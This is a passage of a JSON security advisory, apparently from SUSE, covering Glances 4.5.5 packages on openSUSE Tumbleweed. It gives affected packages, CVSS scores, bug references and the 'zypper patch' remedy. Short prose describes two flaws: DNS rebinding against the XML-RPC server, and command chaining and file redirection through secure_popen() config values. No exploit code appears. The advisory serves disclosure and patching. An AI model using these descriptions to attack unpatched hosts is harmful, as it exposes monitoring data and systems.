"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46608",
"url": "https://www.suse.com/security/cve/CVE-2026-46608"
},
{
"category": "external",
"summary": "SUSE Bug 1268855 for CVE-2026-46608",
"url": "https://bugzilla.suse.com/1268855"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.4,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-46608"
},
{
"cve": "CVE-2026-46611",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46611"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s, implemented in glances/server.py) does not validate the HTTP Host header, leaving it vulnerable to DNS rebinding attacks. An attacker can exploit DNS rebinding to exfiltrate the full system monitoring dataset from a victim\u0027s browser. This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46611",
"url": "https://www.suse.com/security/cve/CVE-2026-46611"
},
{
"category": "external",
"summary": "SUSE Bug 1268856 for CVE-2026-46611",
"url": "https://bugzilla.suse.com/1268856"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-46611"
},
{
"cve": "CVE-2026-53925",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-53925"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source, cross-platform system monitoring tool. From 4.0.8 until 4.5.5, the secure_popen() function in glances/secure.py interprets \u003e (file redirection), | (pipe), and \u0026\u0026 (command chaining) operators in command strings. These operators are applied without any validation of the target file path, piped command, or chained command. When Application Monitoring Process (AMP) modules load their command or service_cmd configuration values from glances.conf, those values are passed directly to secure_popen() with no sanitization. This allows an attacker who can modify the Glances configuration file to write arbitrary content to arbitrary filesystem paths (via \u003e), chain arbitrary commands (via \u0026\u0026), or pipe command output to arbitrary programs (via |). This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-53925",
"url": "https://www.suse.com/security/cve/CVE-2026-53925"
},
{
"category": "external",
"summary": "SUSE Bug 1268984 for CVE-2026-53925",
"url": "https://bugzilla.suse.com/1268984"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-53925"
}
]
}